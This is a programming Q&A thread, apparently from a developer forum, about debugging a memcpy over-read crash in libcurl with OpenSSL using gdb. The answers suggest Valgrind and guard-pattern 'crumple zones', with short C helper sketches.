rdi 0x7fffe77f4f60 140737077268320
rbp 0x7fffe77f4e90 0x7fffe77f4e90
rsp 0x7fffe77f4e48 0x7fffe77f4e48
r8 0x11 17
r9 0x10 16
r10 0x1 1
r11 0x7ffff6a28f7a 140737331236730
r12 0x7fffe3dde490 140737016358032
r13 0x7ffff5bc2a0c 140737316137484
r14 0x7fffe3d69b50 140737015880528
r15 0x0 0
rip 0x7ffff6a2ea5c 0x7ffff6a2ea5c <memcpy+252>
eflags 0x10203 [ CF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) p/x $rsi
$50 = 0x7fffe3e1f000
(gdb) x/20x $rsi
0x7fffe3e1f000: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffe3e1f010: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffe3e1f020: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffe3e1f030: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffe3e1f040: 0x00000000 0x00000000 0x00000000 0x00000000
I'm using libcurl version 7.21.6, c-ares version 1.7.4, and openssl version 1.0.0d. My program is multithreaded, but I have registered mutex callbacks with openssl. The program is running on Ubuntu 11.04 desktop, 64-bit. libc is 2.13.

Clearly libcurl is over-reading the source buffer, and stepping into unreadable memory (page at 0x7fffe3e1f000 -- you can confirm that memory is unreadable by looking at /proc/<pid>/maps for the program being debugged).
Here's where it starts to get weird. I can manually inspect all 256 bytes of both
buf and biomem->data without gdb complaining that the memory isn't accessible.
There is a well-known Linux kernel flaw: even for memory that has PROT_NONE (and causes SIGSEGV on an attempt to read it from the process itself), an attempt by GDB to read it via ptrace(PTRACE_PEEKDATA, ...) succeeds. That explains why you can examine 256 bytes of the source buffer in GDB, even though only 160 of them are actually accessible (0x7fffe3e1f000 - 0x7fffe3e1ef60 = 0xa0), which also matches your observation that memcpy works for sizes up to 160.
Try running your program under Valgrind; chances are it will tell you that you are memcpying from a heap-allocated buffer that is too small.
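The number of readable bytes follows from the addresses in the question: biomem->data is 0x7fffe3e1ef60 and the faulting read is at the page boundary 0x7fffe3e1f000. A minimal sketch of that calculation, assuming 4 KiB pages (typical on x86-64 Linux, but an assumption here); the function name is hypothetical.

```c
#include <stdint.h>

/* Number of bytes from addr up to (not including) the next page boundary.
 * page_size must be a power of two. */
uint64_t bytes_until_page_end(uint64_t addr, uint64_t page_size)
{
    return page_size - (addr & (page_size - 1));
}
```

For addr = 0x7fffe3e1ef60 and a 4096-byte page this gives 160, which is exactly the largest size for which the manual memcpy call from gdb succeeded.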

Do you have any possibility of creating a "crumple zone"?
That is, deliberately increasing the size of the two buffers, or in the case of the structure, putting an extra unused element after the destination?
You then seed the source crumple zone with something such as "0xDEADBEEF", and the destination with something nice. If the destination ever changes, you've got something to work with.
A size of 255 is a bit suggestive: is there any possibility it is somehow being treated as a signed 8-bit quantity, becoming -1, and hence very big? I can't see how gdb wouldn't show it, but ...
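A crumple zone of this kind could look roughly like the following. This is a sketch under stated assumptions: the struct layout, the names, and the guard size are all hypothetical and would need adapting to the real buffers in the program.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define GUARD_WORDS 4
static const uint32_t GUARD_PATTERN = 0xDEADBEEFu;

/* Hypothetical layout: the real buffer followed by an unused guard zone. */
struct guarded_buf {
    char data[256];
    uint32_t guard[GUARD_WORDS];
};

/* Clears the buffer and seeds the guard zone with a recognizable pattern. */
void guard_init(struct guarded_buf *b)
{
    memset(b->data, 0, sizeof b->data);
    for (size_t i = 0; i < GUARD_WORDS; i++)
        b->guard[i] = GUARD_PATTERN;
}

/* Returns 1 if the guard zone is untouched, 0 if something wrote into it. */
int guard_intact(const struct guarded_buf *b)
{
    for (size_t i = 0; i < GUARD_WORDS; i++)
        if (b->guard[i] != GUARD_PATTERN)
            return 0;
    return 1;
}
```

Checking guard_intact() before and after the suspect call narrows down which operation writes past the end of data. The same idea applies to the source side: if the seeded pattern turns up in the copied output, the copy read past the end of the source.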